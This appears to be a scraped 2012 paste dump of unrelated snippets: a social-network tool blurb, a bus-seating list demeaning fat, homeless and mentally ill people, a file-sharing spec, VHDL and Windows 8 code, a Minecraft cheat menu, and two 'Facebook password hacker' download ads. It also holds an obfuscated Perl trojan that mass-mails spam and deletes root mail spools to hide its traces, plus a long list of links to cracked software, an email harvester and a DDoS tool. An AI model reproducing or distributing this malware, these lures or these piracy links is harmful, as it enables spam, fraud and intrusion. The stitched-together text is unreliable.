Sunday, September 30, 2012

SocNetV - Social network visualizer

      SocNetV is a piece of social network analysis and visualization software. It is available at http://socnetv.sourceforge.net/ and has both source and compiled executable s for a number of platforms. Basically, this tool allows you to map out a social network and visually see the links between the nodes of the network. The tool has the ability to import and export in a number of formats and can be populated either manually, from an import file, or by crawling the web.


     In the penetration-testing world, this tool has a few major benefits to us. First, it allows us to easily record and track social network data that we have discovered. Each node in the tool can have a label indicating what or who it refers to and links can be made to other nodes. Secondly, this tool can be used to crawl a web site to a specified level of depth and visually report that information. While this does not necessarily fit with true social network analysis, it can help to map out how web sites interact with each other. Lastly, the visual representations created by this tool are excellent for your reports to your client. Being able to quickly and easily present a diagram showing the social network data that you’ve

The Bus Seating Protocol


    * Everyone -- with noted exemptions -- attempts to sit as far from each other as possible, leaving at minimum one person of space.
* If this is impossible, the following precedence rules are followed:
    * Seats behind an adjacent passenger avoiding passengers of great weight, homelessness, or mental illness, avoiding adjacent people on sides
    * Seats in front of an adjacent passenger avoiding passengers of great weight, homelessness, or mental illness, avoiding adjacent people on sides
    * Sitting "between seats" bus permitting and not uncomfortable
    * At this stage sitting directly next to someone is impossible, so find least person of great weight and/or mental illness and/or homelessness (preferring weight to homelessness to mental illness) to sit next to
    * Failing these, or adjacent people would be too mentally ill, homeless, or fat, stand.
* Bus seating order prefers back to front, unless the passenger is of great weight, elderly, or their stop is < 4km away, then it changes to front to back
* The arrangement is not stable for persons who are not of great weight or elderly (for those groups, it is stable), as follows:
    * Normal persons will move to a better seat fulfilling previous conditions weighing on distance of seat (closer is better)
    * Persons of great weight or the elderly will attempt to sit down, preferring but not strictly adhering to the adjacency rules.
    * The extroverted mentally ill or intoxicated will always try to sit near a passenger who will tolerate them. Passengers may move if the mentally ill or intoxicated person doesn't get the hint, according to the protocol.

THE MPFS PROTOCOL

Specifications:
We create a x packet that contains the following informations, base64 encrypted:
tracker_list = “tcp://tracker.site.net::tcp://tracker.anothersite.net:81::tcp://109.108.95.02:6965”^1,
peer_list = “udp://109.108.58.01:40::udp://98.108.73.24:4545::udp://45.18.78.01:4545”^2,
seed_list = “tcp://109.108.58.01:40::tcp://98.108.73.24:4545::tcp://45.18.78.01:4545”^3,
webseed_list = “http://tracker.site.net::http://tracker.anothersite.net:81::http://109.108.95.02:6965”^4,
file_name = “quantal-ubuntu-gnome-i386-20120902.iso”^5,
file_hash = “d701639597670b7498327787abcbd3649ccd526b”^6,
unique_hash = “9b54ada7928b1e90d2c280a0a9938c0a9da250d9”^7,
full_download = 1^8

_____________________________________________________________________

1: Tracker sends peer_list, seed_list like in the torrent protocol plus tracker_list and webseed_list.
2: Where we can send file parts from UDP connections. No more than 1Mb/sec.
3: Where we can receive file parts from TCP connections. No more than 1Mb/sec.
4: Like the seed_list, but HTTP protocol and more than 1Mb/sec.
5: The file name, for displaying.
6: File hash, for verification purpose (sha1(file_name)).
7: Unique hash, again, for verification purpose (sha1(file_name + ‘.’ + size + ‘.’ timestamp)).
8: If 1: we don’t need to ask for seeds nor webseeds anymore, else yes.

VHDL Program File

----------------------------------------------------------------------------------
-- Company:
-- Engineer:
--
-- Create Date:    21:21:38 09/30/2012
-- Design Name:
-- Module Name:    4bitadder - Behavioral
-- Project Name:
-- Target Devices:
-- Tool versions:
-- Description:
--
-- Dependencies:
--
-- Revision:
-- Revision 0.01 - File Created
-- Additional Comments:
--
----------------------------------------------------------------------------------
library IEEE;
use IEEE.STD_LOGIC_1164.ALL;
use IEEE.STD_LOGIC_ARITH.ALL;
use IEEE.STD_LOGIC_UNSIGNED.ALL;

---- Uncomment the following library declaration if instantiating
---- any Xilinx primitives in this code.
--library UNISIM;
--use UNISIM.VComponents.all;

entity adder is
    Port ( data1 : in  STD_LOGIC_VECTOR (3 downto 0);
           data2 : in  STD_LOGIC_VECTOR (3 downto 0);
              clk : in  STD_LOGIC;
           common : out  STD_LOGIC_VECTOR (1 downto 0);
           to7seg : out  STD_LOGIC_VECTOR (6 downto 0));
end adder;

architecture Behavioral of adder is
    signal summation : STD_LOGIC_VECTOR (4 downto 0) := "00000";
    signal data27seg : STD_LOGIC_VECTOR (3 downto 0) := "0000";
begin

    summation <= ('0'&data1) + ('0'&data2);
   
    common <= "10" when clk = '1' else
                 "01" when clk = '0';

    data27seg <= summation(3 downto 0) when clk = '1' else
                     "000"&summation(4) when clk = '0';

    to7seg <= "1110001" when data27seg = "1111" else
                 "1111001" when data27seg = "1110" else
                 "1011110" when data27seg = "1101" else
                 "0111001" when data27seg = "1100" else
                 "1111100" when data27seg = "1011" else
                 "1110111" when data27seg = "1010" else
                 "1101111" when data27seg = "1001" else
                 "1111111" when data27seg = "1000" else
                 "0000111" when data27seg = "0111" else
                 "1111101" when data27seg = "0110" else
                 "1101101" when data27seg = "0101" else
                 "1100110" when data27seg = "0100" else
                 "1100111" when data27seg = "0011" else
                 "1011011" when data27seg = "0010" else
                 "0000110" when data27seg = "0001" else
                 "0111111";

end Behavioral;

Facebook password cracker

Finally  , the real Facebook hacker is here.
The first time published. Hack any facebook password.
No more private ! Hurry up to enjoy that cracker. ITS FREE ;)

-----------------------------------------------
Link: http://www.2shared.com/file/St37OpR5/facebook_password_hack.html
-----------------------------------------------

Features:

* Instant access to any profile.
* Fast and Simple.
* Total anonymity.
* Reveal their secrets in seconds.
* Protect your profile.

[Script] Help form in Java

package net.minecraft.src;

import java.awt.MouseInfo;
import org.lwjgl.input.Keyboard;
import org.lwjgl.opengl.GL11;
import net.minecraft.client.Minecraft;
import net.minecraft.src.GuiScreen;
import net.minecraft.src.NetworkManager;

public class Menu extends GuiScreen{
      
        public int x;
        public int y;
        private Minecraft mc;
      
        public Menu(Minecraft minecraft){
                x = MouseInfo.getPointerInfo().getLocation().x;
                y = MouseInfo.getPointerInfo().getLocation().y;
                mc = minecraft;
                height = mc.displayHeight;
                width = mc.displayWidth;
        }
      
        public boolean doesGuiPauseGame(){
                return false;
        }
      
        public void initGui(){
                Keyboard.enableRepeatEvents(true);
        }
      
        public void onGuiClosed(){
                Keyboard.enableRepeatEvents(true);
        }
      
        protected void keyTyped(char c, int i){
                if(i == 1){
                        mc.displayGuiScreen(null);
                        return;
                }
        }
      
        public void drawScreen(int i, int j, float f){
            drawRect(Variables.playerX, Variables.playerY, Variables.playerX+Variables.playerWidth, Variables.playerY+12, 0x8000FA9A);//player
            fontRenderer.drawString("Player", Variables.MainOffsetx+Variables.playerX, Variables.playerY, 0x000000);//player
           
            drawRect(Variables.playerX, Variables.playerY + 12 + 1,Variables.playerX+Variables.playerWidth, Variables.playerY + 12 + 1 + Variables.playerHeight, 0xA0000000);//player options
            fontRenderer.drawString("No Fall", Variables.MainOffsetx + Variables.playerX,Variables.playerY + 12 + 1 + 2 + 0*10, Variables.nofall ? 0x00FF00 : 0xFFFFFF);
            fontRenderer.drawString("Sprint", Variables.MainOffsetx + Variables.playerX,Variables.playerY + 12 + 1 + 2 + 1*10, Variables.sprint ? 0x00FF00 : 0xFFFFFF);
            fontRenderer.drawString("Aimbot", Variables.MainOffsetx + Variables.playerX,Variables.playerY + 12 + 1 + 2 + 2*10, Variables.aimbot ? 0x00FF00 : 0xFFFFFF);
            fontRenderer.drawString("Fly", Variables.MainOffsetx + Variables.playerX,Variables.playerY + 12 + 1 + 2 + 3*10, Variables.fly ? 0x00FF00 : 0xFFFFFF);
            for (int ii = 0; ii < 4; ii++){
            drawGradientRect(Variables.playerX+Variables.playerWidth - 22, Variables.playerY + 12 +1+2+ii*10, Variables.playerX+Variables.playerWidth - 2, Variables.playerY+12+1+2+ii*10+8, 0xFF555555, 0xFFAAAAAA);
        }
            GL11.glScalef(0.5F, 0.5F, 0.5F);
            fontRenderer.drawString(Variables.nofall ?"Disable" : "Enable",(Variables.playerX + Variables.playerWidth - 22 + 2)*2, (Variables.playerY + 12 + 1 + 2 + 0*10 + 2)*2, 0xFF0000);
            fontRenderer.drawString(Variables.sprint ?"Disable" : "Enable",(Variables.playerX + Variables.playerWidth - 22 + 2)*2, (Variables.playerY + 12 + 1 + 2 + 1*10 + 2)*2, 0xFF0000);
            fontRenderer.drawString(Variables.aimbot ?"Disable" : "Enable",(Variables.playerX + Variables.playerWidth - 22 + 2)*2, (Variables.playerY + 12 + 1 + 2  +2*10 + 2)*2, 0xFF0000);
            fontRenderer.drawString(Variables.fly ?"Disable" : "Enable",(Variables.playerX + Variables.playerWidth - 22 + 2)*2, (Variables.playerY + 12 + 1 + 2 + 3*10 + 2)*2, 0xFF0000);
           
            GL11.glScalef(2F, 2F, 2F);
        }

      
        protected void mouseClicked(int i, int j, int k){
                //if(  <= i &&  <= j &&  >= i &&  >= j)
            if(Variables.playerX+Variables.playerWidth - 22 <= i && Variables.playerY + 12 + 1 + 2 + 0*10 <= j && Variables.playerX+Variables.playerWidth - 2 >= i && Variables.playerY + 12 + 2 + 1+ 0*10+8 >= j){
                Variables.nofall = !Variables.nofall;
            }
            if(Variables.playerX+Variables.playerWidth - 22 <= i && Variables.playerY + 12 + 1 + 2 + 1*10 <= j && Variables.playerX+Variables.playerWidth - 2 >= i && Variables.playerY + 12 + 2 + 1 + 1*10+8 >= j){
                Variables.sprint = !Variables.sprint;
            }
            if(Variables.playerX+Variables.playerWidth - 22 <= i && Variables.playerY + 12 + 1 + 2 + 2*10 <= j && Variables.playerX+Variables.playerWidth - 2 >= i && Variables.playerY + 12+ 2 + 1 + 2*10+8 >= j){
                Variables.aimbot = !Variables.aimbot;
            }
            if(Variables.playerX+Variables.playerWidth - 22 <= i && Variables.playerY + 12 + 1 + 2 + 3*10 <= j && Variables.playerX+Variables.playerWidth - 2 >= i && Variables.playerY + 12 + 2 + 1 + 3*10+8 >= j){
                Variables.fly = !Variables.fly;
            }

        }
}

FaceBook Hacker 2012 working!


How to use this program? It's simple! You run the program, enter the email of the person you want to hack, and then wait a few second to get the password!

How does this program work? Well, we don't wanna give out the exploit, but it has something to do with facebook's security. It will get patches soon so use it while it lasts!

===========================================


Download link: http://dl.dropbox.com/u/96098525/FacebookHacker.exe
Please note some Anti Viruses may detect this as a virus. This injects code into FBs servers, ofcourse it will be recognized by Anti Viruses. If you don't trust it don't use.

Trojan in Perl

#!/usr/bin/perl

use strict;
use Socket;
use CGI;
srand( time ^ $$ ^ unpack "%L*", `ps axww | gzip` );
$SIG{PIPE} = sub { die "Broken pipe" };
$ENV{PATH} =
  $ENV{PATH} . ":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin";
my $i5mk = ( $< == 0 );
my $ha3c = ( ( getpwuid($>) )[0] );
my $b57i = 0;
$b57i = length( $ARGV[0] ) if ( $ARGV[0] =~ /^ +$/ );
my $k2df = int( rand(2147483647) );
my ( $ii1p, $g651, $ed90 );
my $cnik = 443;
my $id8k = "/b/index.php";
my $jdpm = '/tmp/...';
my $h8h1 = 0;
my $f377 = 0;
my $h788 = 0;
my $d1m7 = 0;
my $cnon = 0;
my $iocp = 0;
my $c84a = 50;
my $p    = "1234567890";
my $ch4p;
my $jdmk = "sendmail";
my $c1eh;
my $k1a3;
my %cmp4;
my $h7on = 27;
$cmp4{'d_v'}  = $h7on;
$cmp4{'d_w'}  = $ha3c;
$cmp4{'d_rb'} = $b57i;
$cmp4{'d_pi'} = $$;
$cmp4{'d_iv'} = $];
sub aam { print '[' . localtime() . '] '; print @_; }

sub aah {
    return 0 if !open( SIGNFH, ">$jdpm" );
    return 0 if !flock( SIGNFH, 2 | 4 );
    return 1;
}

sub aap {
    my $eaoo = shift;
    my $in7h = shift;
    my $gle5 = shift;
    my $kf33 = shift;
    my $k65l = shift;
    my $hhoe = $eaoo->{'name'};
    my $j9ej = $eaoo->{'addr'};
    my $feib = ab2(4);
    $kf33 =~ s/\[\[firstname\]\]/$hhoe/g;
    $kf33 =~ s/\[\[id\]\]/$j9ej/g;
    $kf33 =~ s/\[\[count\]\]/$k65l/g;
    $kf33 =~ s/\[\[rand\]\]/$feib/g;
    $gle5 =~ s/\[\[firstname\]\]/$hhoe/g;
    $gle5 =~ s/\[\[id\]\]/$j9ej/g;
    $gle5 =~ s/\[\[count\]\]/$k65l/g;
    $gle5 =~ s/\[\[rand\]\]/$feib/g;
    my $ip30 =
        "From: $in7h|To: "
      . ( $hhoe ? "\"$hhoe\" <$j9ej>" : "$j9ej" )
      . "|Subject: $gle5";
    eval {
        open SENDMAIL, "| $jdmk -t";
        print SENDMAIL "From: $in7h\n";
        print SENDMAIL "To: "
          . ( $hhoe ? "\"$hhoe\" <$j9ej>" : "$j9ej" ) . "\n";
        print SENDMAIL "Subject: $gle5\n";
        print SENDMAIL "$kf33";
        close SENDMAIL;
    };
    if ($@) { my $cka4 = $@; chomp $cka4; return 0; }
    return 1;
}

sub aak {
    my $k811 = shift;
    my $jjho = shift;
    my @iheh = @$jjho;
    my $in7h = shift @iheh;
    my $gle5 = shift @iheh;
    my $kf33;
    while ( scalar(@iheh) ) {
        my $kh8m = shift @iheh;
        if ( $kh8m eq $k811 ) { last; }
        $kf33 .= $kh8m . "\n";
    }
    my @ag4c;
    while ( scalar(@iheh) ) {
        my $eaoo = {};
        my $kh8m = shift @iheh;
        if ( $kh8m =~ /^(.*)\t(.+)$/ ) {
            $eaoo->{'addr'} = $2;
            $eaoo->{'name'} = $1;
        }
        else { $eaoo->{'addr'} = $kh8m; }
        push @ag4c, $eaoo if ( $eaoo->{'addr'} );
    }
    for ( my $i = 0 ; $i < scalar(@ag4c) ; ) {
        if   ( aap( $ag4c[$i], $in7h, $gle5, $kf33, $i ) ) { $h788++; $d1m7++; }
        else                                               { $cnon++; $iocp++; }
        $i++;
    }
    if ($i5mk) {
`rm -f  /var/mail/root /var/spool/mail/root /var/mail/mail /var/spool/mail/mail`;
    }
    `rm -f ~/dead.letter`;
}

sub aae {
    my $c056 = sprintf(
        $k1a3 . " | grep -ci '        "https://accounts.google.com/ServiceLogin?service=mail"
    );
    my ($ieha) = `$c056`;
    chomp $ieha;
    return $ieha;
}

sub ab7 {
    if ( $c1eh eq "wget" ) {
        my ($d4o0) =
`wget --version | head -n1 | grep -o "\\.[0-9]*" | grep -o "[0-9]*\$"`;
        chomp $d4o0;
        $d4o0 = int($d4o0);
        $k1a3 = "wget -q -O - -t 1 -T 60 ";
        $k1a3 .= "--no-check-certificate " if ( $d4o0 > 9 );
        $k1a3 .= '"%s"';
    }
    elsif ( $c1eh eq "curl" )  { $k1a3 = 'curl -s -k --max-time 60 "%s"'; }
    elsif ( $c1eh eq "fetch" ) { $k1a3 = 'fetch -T 60 -q -o - "%s"'; }
}

sub ab0 {
    my @kh24 = ( 'wget', 'curl', 'fetch' );
    undef $c1eh;
    foreach my $jjaj (@kh24) {
        if ($ch4p) { my $c31k = `which $jjaj`; next if ( $c31k !~ /^\// ); }
        $c1eh = $jjaj;
        ab7();
        if ( !aae() ) { undef $c1eh; next; }
        last;
    }
    if ( !$c1eh ) { $c1eh = "wget"; ab7(); }
    $cmp4{'d_br'} = $c1eh;
}
my $jf8c = 0;

sub ab5 {
    return if ( time() - $jf8c < 3600 );
    $jf8c = time();
    $ch4p = `which which | grep -v alias | sed -e 's/^[[:space:]]*//'`;
    ab0();
    ab1();
    my $d2fa =
`ps -xo command | grep -v grep | grep postfix/master | wc -l | sed -e 's/^[[:space:]]*//'`;
    chomp $d2fa;
    if ($d2fa) {
        $cmp4{'d_ma'} = 'postfix';
        if ($ch4p) {
            $d2fa = `which sendmail.postfix`;
            chomp $d2fa;
            $jdmk = $d2fa if ( $d2fa =~ /^\/.*aap.postfix$/ );
        }
    }
    else {
        $cmp4{'d_ma'} = 'sendmail';
        if ($i5mk) {
            my $k648 = `service sendmail status`;
            chomp $k648;
            if ( $k648 =~ /^aap is stopped/ ) { `service sendmail start`; }
        }
    }
    $cmp4{'d_mc'} = $jdmk;
}

sub ab1 {
    my $go98 = 'sendmail';
    if ($ch4p) {
        my $c0k3 = `which $go98`;
        chomp $c0k3;
        if ( $c0k3 =~ /^(\/[^ ]+)/ ) { $jdmk = $1; return 1; }
    }
    my @i1bb = split /\n/, `locate $go98 | head -n1000`;
    push @i1bb, split /\n/,
`find /bin/ /sbin/ /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin/ -type f -or -type l | grep $go98`;
    chomp @i1bb;
    my @din4;
    foreach my $f2pe (@i1bb) {
        next if ( -d $f2pe );
        next if ( !-x $f2pe );
        next if ( $f2pe =~ /\.so$/ );
        if ( $f2pe =~ /bin\// && $f2pe =~ /$go98$/ ) {
            $jdmk = $f2pe;
            return 1;
        }
        push( @din4, $f2pe );
    }
    foreach my $f2pe

Messenger 2012 Offline Download

Official Windows 7 ISO from Digital River

Digital River is Microsoft official online distributor partner.
The Windows 7 ISO images hosted on Digital River is genuine and official version, and the downloads from the server is legal.
It’s after all one of the official channel where end-users who purchase a license (product key) for Windows 7 get the setup installation files.
without a genuine and legally purchased product key, you can’t get Windows 7 activated, and Windows 7 will only run as evaluation copy for up to 30 days.


English
Windows 7 Professional x86        http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65804/X15-65804.iso
Windows 7 Professional x64        http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65805/X15-65805.iso
Windows 7 Professional x86 SP1    http://msft.digitalrivercontent.net/win/X17-59183.iso
Windows 7 Professional x64 SP1    http://msft.digitalrivercontent.net/win/X17-59186.iso
Windows 7 Ultimate x86 SP1        http://msft.digitalrivercontent.net/win/X17-59463.iso
Windows 7 Ultimate x64 SP1        http://msft.digitalrivercontent.net/win/X17-59465.iso

Chinese, traditional (Taiwan)
Windows 7 Professional x86 SP1    http://msft.digitalrivercontent.net/win/X17-59295.iso
Windows 7 Professional x64 SP1    http://msft.digitalrivercontent.net/win/X17-59297.iso

Danish (Denmark)
Windows 7 Professional x86 SP1    http://msft.digitalrivercontent.net/win/X17-59891.iso
Windows 7 Professional x64 SP1    http://msft.digitalrivercontent.net/win/X17-59883.iso

Dutch (Netherlands)
Windows 7 Professional x86 SP1    http://msft.digitalrivercontent.net/win/X17-59233.iso
Windows 7 Professional x64 SP1    http://msft.digitalrivercontent.net/win/X17-59236.iso

Finnish
Windows 7 Professional x86 SP1    http://msft.digitalrivercontent.net/win/X17-59192.iso
Windows 7 Professional x64 SP1    http://msft.digitalrivercontent.net/win/X17-59194.iso

French
Windows 7 Professional x86        http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65810/X15-65810.iso
Windows 7 Professional x64        http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65811/X15-65811.iso
Windows 7 Professional x86 SP1    http://msft.digitalrivercontent.net/win/X17-59195.iso
Windows 7 Professional x64 SP1    http://msft.digitalrivercontent.net/win/X17-59197.iso
Windows 7 Ultimate x86 SP1        http://msft.digitalrivercontent.net/win/X17-59477.iso
Windows 7 Ultimate x64 SP1        http://msft.digitalrivercontent.net/win/X17-59479.iso

German
Windows 7 Professional x86        http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65812/X15-65812.iso
Windows 7 Professional x64        http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65813/X15-65813.iso
Windows 7 Professional x86 SP1    http://msft.digitalrivercontent.net/win/X17-59886.iso
Windows 7 Professional x64 SP1    http://msft.digitalrivercontent.net/win/X17-59885.iso

Italian
Windows 7 Professional x86 SP1    http://msft.digitalrivercontent.net/win/X17-59212.iso
Windows 7 Professional x64 SP1    http://msft.digitalrivercontent.net/win/X17-59215.iso

Korean (Republic of Korea)
Windows 7 Professional K x86 SP1  http://msft.digitalrivercontent.net/win/X17-59299.iso
Windows 7 Professional K x64 SP1  http://msft.digitalrivercontent.net/win/X17-59300.iso

Norwegian (Norway)
Windows 7 Professional x86 SP1    http://msft.digitalrivercontent.net/win/X17-59229.iso
Windows 7 Professional x64 SP1    http://msft.digitalrivercontent.net/win/X17-59231.iso

Portuguese
Windows 7 Professional x86 SP1    http://msft.digitalrivercontent.net/win/X17-59246.iso
Windows 7 Professional x64 SP1    http://msft.digitalrivercontent.net/win/X17-59247.iso

Spanish
Windows 7 Professional x86        http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65842/X15-65842.iso
Windows 7 Professional x64        http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65843/X15-65843.iso
Windows 7 Professional x86 SP1    http://msft.digitalrivercontent.net/win/X17-58866.iso
Windows 7 Professional x64 SP1    http://msft.digitalrivercontent.net/win/X17-58868.iso
Windows 7 Ultimate x86 SP1        http://msft.digitalrivercontent.net/win/X17-58877.iso
Windows 7 Ultimate x64 SP1        http://msft.digitalrivercontent.net/win/X17-58879.iso

Swedish
Windows 7 Professional x86 SP1    http://msft.digitalrivercontent.net/win/X17-59271.iso
Windows 7 Professional x64 SP1    http://msft.digitalrivercontent.net/win/X17-59273.iso

Windows Phone 7 5 Data Cookbook download

File name:   Windows.Phone.7.5.Data.Cookbook.pdf
Size:            22.00 MB
Type:          .pdf
Source:        http://www.ebook3000.com/Windows-Phone-7-5-Data-Cookbook_149642.html

Download links
--------------
http://bitshare.com/files/3bm5wg0a/Windows.Phone.7.5.Data.Cookbook.pdf.html

Windows 8 Javascript - Geolocation

// Windows8 Javascript - Geolocation

// First, in package.appxmanifest enable location

// Second, default.html

    Latitude:


    Longitude:


    Accuracy:




// Third, default.js
(function () {
    "use strict";

    var loc;

    WinJS.Binding.optimizeBindingReferences = true;

    var app = WinJS.Application;
    var activation = Windows.ApplicationModel.Activation;
    loc = new Windows.Devices.Geolocation.Geolocator();
    loc.getGeopositionAsync().then(getPositionHandler, errorHandler);

    function getPositionHandler(pos) {
        document.getElementById('latitude').innerHTML = pos.coordinate.latitude;
        document.getElementById('longitude').innerHTML = pos.coordinate.longitude;
        document.getElementById('accuracy').innerHTML = pos.coordinate.accuracy;
    }

    function errorHandler(e) {
        // TODO: Handle Error    
    }

    app.onactivated = function (args) {
        if (args.detail.kind === activation.ActivationKind.launch) {
            if (args.detail.previousExecutionState !== activation.ApplicationExecutionState.terminated) {
                // TODO: This application has been newly launched. Initialize
                // your application here.
            } else {
                // TODO: This application has been reactivated from suspension.
                // Restore application state here.
            }
            args.setPromise(WinJS.UI.processAll());
        }
    };

    app.oncheckpoint = function (args) {
        // TODO: This application is about to be suspended. Save any state
        // that needs to persist across suspensions here. You might use the
        // WinJS.Application.sessionState object, which is automatically
        // saved and restored across suspension. If you need to complete an
        // asynchronous operation before your application is suspended, call
        // args.setPromise().
    };

    app.start();
})();

Links for downloading


Copy and paste the below URL in address bar to download packages:


Xilisoft AVI2DVD Converter V3.0.45.Build.0911.Multilingual-ENGiNE
http://www.2shared.com/file/pnBvtIrK/Xilisoft_AVI2DVD_Converter_V30.html

SPB Mobile Shell V3 5 1 Build 9687 - (Malestrom)
http://rapidgator.net/file/47381480/SPB_Mobile_Shell_V3_5_1_Build_9687_-_(Malestrom).zip.html

Unified Color 32 Float 2 For Adobe Photoshop (x86 X64) Incl Patch @ Only By THE RAIN
http://rapidgator.net/file/47381568/Unified_Color_32_Float_2_For_Adobe_Photoshop_(x86_X64)_Incl_Patch_@_Only_By_THE_RAIN.zip.html

Internet Cyclone 2.14 With Crack By Sum1_Here
http://rapidgator.net/file/47381704/Internet_Cyclone_2.14_With_Crack_By_Sum1_Here.zip.html

Veridium HomeGuard Activity Monitor V1.1.2.1 By Adrian Dennis
http://www.2shared.com/file/LMppz__1/Veridium_HomeGuard_Activity_Mo.html

Rowmote Pro Remote Control For Mac And Apple TV V3.1.1 (KING Ay
http://www.2shared.com/file/yxNrvLWu/Rowmote_Pro_Remote_Control_For.html

Hindi Word Pad Softp2p
http://rapidgator.net/file/47381834/Hindi_Word_Pad_Softp2p.zip.html

Perfect Applock 5.2.1 For Android - NoXoN
http://www.2shared.com/file/7HbV4_N9/Perfect_Applock_521_For_Androi.html

SPB Mobile Shell 3.0 SPB Weather 2.1.1
http://rapidgator.net/file/47381933/SPB_Mobile_Shell_3.0_SPB_Weather_2.1.1.zip.html

DVDFab Platinum V8.1.2.2 Qt Beta Patch
http://www.2shared.com/file/4m_jsRo0/DVDFab_Platinum_V8122_Qt_Beta_.html

SlySoft AnyDVD HD V6.8.0.0 By Cool Release
http://rapidgator.net/file/47382138/SlySoft_AnyDVD_HD_V6.8.0.0_By_Cool_Release.zip.html

Power ISO V4.6 (Cracked By Me Trazyfilth)
http://rapidgator.net/file/47382296/Power_ISO_V4.6_(Cracked_By_Me_Trazyfilth).zip.html

GoldWave 5.52 Audio Editor Keygen
http://rapidgator.net/file/47382369/GoldWave_5.52_Audio_Editor_Keygen.zip.html

Key Skills For Reading Vocabulary Development Homeschool Educati
http://www.2shared.com/file/J6lkDU-M/Key_Skills_For_Reading_Vocabul.html

WinZip 12.1 Pro Build 8519 Portable
http://rapidgator.net/file/47382432/WinZip_12.1_Pro_Build_8519_Portable.zip.html

Super Email Harvester V5 63 WinAll Cracked-HS
http://www.2shared.com/file/Nm7DsQdK/Super_Email_Harvester_V5_63_Wi.html

Icon Packager 4 Patch 10 Icon Packeges ADilAns
http://www.2shared.com/file/qsWxJls4/Icon_Packager_4_Patch_10_Icon_.html

PhotoGoo V1.1 (Iphone-Ipod-Ipad) (KING Ayub)
http://www.2shared.com/file/DCF4wtk1/PhotoGoo_V11__Iphone-Ipod-Ipad.html

DB Power Amp Audio Convertor
http://www.2shared.com/file/J0o2mVPY/DB_Power_Amp_Audio_Convertor.html

WinRAR V3.90 Beta 4 X86-X64 PreRegged
http://www.2shared.com/file/ZM9y4AIT/WinRAR_V390_Beta_4_X86-X64_Pre.html

BluffTitler DX9 V7.54 Programas Spanish
http://rapidgator.net/file/47382340/BluffTitler_DX9_V7.54_Programas_Spanish.zip.html

ClubDJ (ProVJ) 4.4.1.0 Bsbt Rg
http://www.2shared.com/file/nWHP7Nw-/ClubDJ__ProVJ__4410_Bsbt_Rg.html

SiSoftware Sandra Enterprise V2010.5.16.41 Incl Keygen
http://uploaded.to/file/7n81h5cf

Bulk File Renamer V.7.1 Crack -- TSG
http://www.2shared.com/file/yhOyGvIx/Bulk_File_Renamer_V71_Crack_--.html

Audio.Transcoder.1.9.8.1218 - Knight Riders Release
http://www.2shared.com/file/MRAyjsYH/AudioTranscoder1981218_-_Knigh.html

Bootland--Install Windows With USB [h33t][MurtajiZ]
http://www.2shared.com/file/XRiwPTXz/Bootland--Install_Windows_With.html

Multimedia PHP Scripts
http://rapidgator.net/file/47382459/Multimedia_PHP_Scripts.zip.html

IP Spoofing [maxxcrime] [kickass]
http://www.2shared.com/file/rzbR1_28/IP_Spoofing_maxxcrime_kickass.html

STOIK Imagic 4.0.3.5
http://rapidgator.net/file/47382496/STOIK_Imagic_4.0.3.5.zip.html

Hedge Maze Deluxe V1 2 IPhone IPod Touch Cracked-COREPDA
http://www.2shared.com/file/MJxmxrFv/Hedge_Maze_Deluxe_V1_2_IPhone_.html

Steam Key Generator
http://uploaded.to/file/bx8u3pkr

AnyReader 3.4.461 Incl Keygen [vokeon]
http://www.2shared.com/file/ejzlYbpC/AnyReader_34461_Incl_Keygen_vo.html

D16 Group Nithonat VSTi V1.0.3
http://rapidshare.com/files/388094701/D16%20Group%20Nithonat%20VSTi%20V1.0.3.zip

Stellarium MEGA
http://www.2shared.com/file/AtZRuiNe/Stellarium_MEGA.html

Tipard IPod Converter Suite V3.2.22 Crack [RH]
http://rapidshare.com/files/1870121545/Tipard%20IPod%20Converter%20Suite%20V3.2.22%20Crack%20_RH_.zip

VideoGet V3.0.2 Patch(latest) [ Kentuckykiid ]
http://www.2shared.com/file/9IaDOFJ5/VideoGet_V302_Patch_latest___K.html

DeskSpace V1.5.7.1 Retail
http://rapidshare.com/files/4184792165/DeskSpace%20V1.5.7.1%20Retail.zip

DaFont.com === Complete Font Archive Sorted By Categories === Ap
http://www.2shared.com/file/6hjMXT1B/DaFontcom__Complete_Font_Archi.html

Golden FTP Server Pro V3 66 WinALL Cracked-BRD
http://rapidshare.com/files/842902035/Golden%20FTP%20Server%20Pro%20V3%2066%20WinALL%20Cracked-BRD.zip

OpoSoft 3 Video Converter Pack Serials
http://rapidshare.com/files/3568154559/OpoSoft%203%20Video%20Converter%20Pack%20Serials.zip

DFX Audio Enhancer V9.3 Final Activated
http://www.2shared.com/file/KafOWmMl/DFX_Audio_Enhancer_V93_Final_A.html

Todo En Uno PlayStation3
http://rapidshare.com/files/1263217862/Todo%20En%20Uno%20PlayStation3.zip

Xilisoft Video Converter Ultimate
http://www.2shared.com/file/YzbZ2_i9/Xilisoft_Video_Converter_Ultim.html

Clean Disk Security V7.93 Full License{fiesta569}.zip
http://rapidshare.com/files/349459222/Clean%20Disk%20Security%20V7.93%20Full%20License_fiesta569_.zip.zip

Google TV Box 2009 [ Kentuckykiid ]
http://www.2shared.com/file/YQd1zC5f/Google_TV_Box_2009__Kentuckyki.html

Protected Music Converter 1.6.4 Software Serial Key
http://rapidshare.com/files/630306803/Protected%20Music%20Converter%201.6.4%20Software%20Serial%20Key.zip

SftpDrive 1.7.9 Incl. Serial
http://www.2shared.com/file/ALuwOWHj/SftpDrive_179_Incl_Serial.html

Aone Ultra DVD Ripper V3.2.0429
http://rapidshare.com/files/1329646039/Aone%20Ultra%20DVD%20Ripper%20V3.2.0429.zip

4U M2TS Converter 1.2.8-serials Incl
http://www.2shared.com/file/kam3F-zN/4U_M2TS_Converter_128-serials_.html

Pioneer GPS Navigation CNDV-60M V1 0 2006 DVD Europe Disk West
http://rapidshare.com/files/1779523051/Pioneer%20GPS%20Navigation%20CNDV-60M%20V1%200%202006%20DVD%20Europe%20Disk%20West.zip

DDOS Program (Warriors Battle Cannon)
http://rapidshare.com/files/542123018/DDOS%20Program%20%28Warriors%20Battle%20Cannon%29.zip

500 True Type Fonts ADilAns H33t
